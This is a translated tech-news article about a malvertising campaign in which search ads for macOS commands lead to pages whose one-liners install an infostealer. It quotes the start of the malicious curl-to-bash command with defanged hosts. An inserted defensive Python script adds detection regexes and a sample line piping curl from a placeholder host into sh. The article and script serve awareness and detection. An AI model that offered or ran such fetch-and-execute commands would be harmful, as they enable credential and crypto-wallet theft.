Malvertising: Search for standard commands for Macs delivers Infostealer

Cunning scam: When searching for standard commands for macOS, pages appear that display commands for installing malware.


(Image: Balefire / Shutterstock.com)


Cybercriminals are currently using a perfidious scam online to trick unsuspecting users into installing malware. When users search for standard macOS commands, the results lead to websites that display commands which, instead of performing the function searched for, embed an infostealer in the system.

Advertising on the search results leads to a malware page.

(Image: heise online / cku)

For example, a Google search for the macOS command to flush the DNS cache ("mac flush dns cache") returns, in the advertisement slot of the results list, a web page that purports to explain the command. After clicking, the URL mac-safer[.]com shows how to call the command.

The advertised website displays a command that downloads and installs malware.

(Image: heise online / cku)

However, the command begins with /bin/bash -c "$(curl -fsSL $(echo... and bears no resemblance to the usual commands for flushing the DNS cache (sudo dscacheutil -flushcache; sudo killall -HUP mDNSResponder, where the call with sudo legitimately triggers a password prompt). The website also announces that the password will be requested when the command is run. Here, however, this is done with malicious intent.

Instead of clearing the DNS cache, the command downloads a malicious script named "install.sh" from "icloudservers[.]com". The script is executed, asks for the password, verifies it with the "dscl" command, and then starts the "update" file. According to VirusTotal, only a few virus scanners currently detect this as an infostealer, i.e. malware that harvests information. Classically, this means credentials for online services, but crypto wallets are also a frequent target of such malware.
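As an added defensive illustration, not code from heise or from the campaign described: a small Python triage script that scores shell-history lines for the delivery pattern the article quotes (bash -c running the output of curl inside command substitution, a URL hidden behind a base64-decoded echo, a dscl password check) while leaving the legitimate flush commands unflagged. The sample history lines, the hosts and the dscl -authonly form are constructed assumptions, not values taken from the campaign.

```python
import re

# Legitimate macOS DNS-cache flush from the article, kept for comparison.
LEGIT_FLUSH = "sudo dscacheutil -flushcache; sudo killall -HUP mDNSResponder"

# Weighted indicators of the "paste this one-liner" delivery pattern.
# The list is a starting point for triage, not a complete signature set.
INDICATORS = [
    (r"\bbash\s+-c\s+[\"']?\$\(\s*curl\b", 3, "bash -c runs whatever curl fetched"),
    (r"\bcurl\b[^|;]*\|\s*(sudo\s+)?(ba)?sh\b", 3, "curl output piped into a shell"),
    (r"\$\(\s*echo\b[^)]*\|\s*base64\s+(-d|--decode)", 2, "URL hidden behind base64 in $(echo ...)"),
    (r"\bdscl\b[^;|]*-authonly", 2, "password checked with dscl -authonly (assumed form)"),
]
INDICATORS_COMPILED = [(re.compile(p), w, d) for p, w, d in INDICATORS]


def score_command(cmd):
    """Return (score, matched descriptions) for one shell command line."""
    hits = [(w, d) for rx, w, d in INDICATORS_COMPILED if rx.search(cmd)]
    return sum(w for w, _ in hits), [d for _, d in hits]


def triage(lines, threshold=3):
    """Return [(line, score, hits)] for every line scoring at or above threshold."""
    flagged = []
    for line in lines:
        score, hits = score_command(line)
        if score >= threshold:
            flagged.append((line, score, hits))
    return flagged


# Constructed sample of a shell history. The third line mimics the shape the
# article quotes (/bin/bash -c "$(curl -fsSL $(echo...); hosts are placeholders.
SAMPLE_HISTORY = [
    LEGIT_FLUSH,
    "brew update && brew upgrade",
    '/bin/bash -c "$(curl -fsSL $(echo BASE64_PLACEHOLDER | base64 -d))"',
    "curl -fsSL https://example.invalid/install.sh | sh",
    'dscl . -authonly "$USER" "$pw"',  # on its own this stays below the threshold
]

if __name__ == "__main__":
    for line, score, hits in triage(SAMPLE_HISTORY):
        print(f"[{score}] {line}\n      " + "; ".join(hits))
```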


On the malicious website, the masterminds also offer supposed solutions for other problems.

The malicious website advertised provides supposed solutions to other problems. All of them distribute malware, of course.

(Image: heise security / ju)

One ironic example is the subpage "How to Remove Malware from Your Mac", which apparently delivers the very same infostealer. The website also covers other common search queries: solving Mac overheating problems, freeing up disk space on your Mac, getting a non-functioning Mac camera working again, and various more.

Malvertising remains a persistent problem. At the beginning of the year, for example, criminals tried to use an imitation of the Homebrew website to trick Mac users into downloading malicious code.

(dmk)


This article was originally published in German. It was translated with technical assistance and editorially reviewed before publication.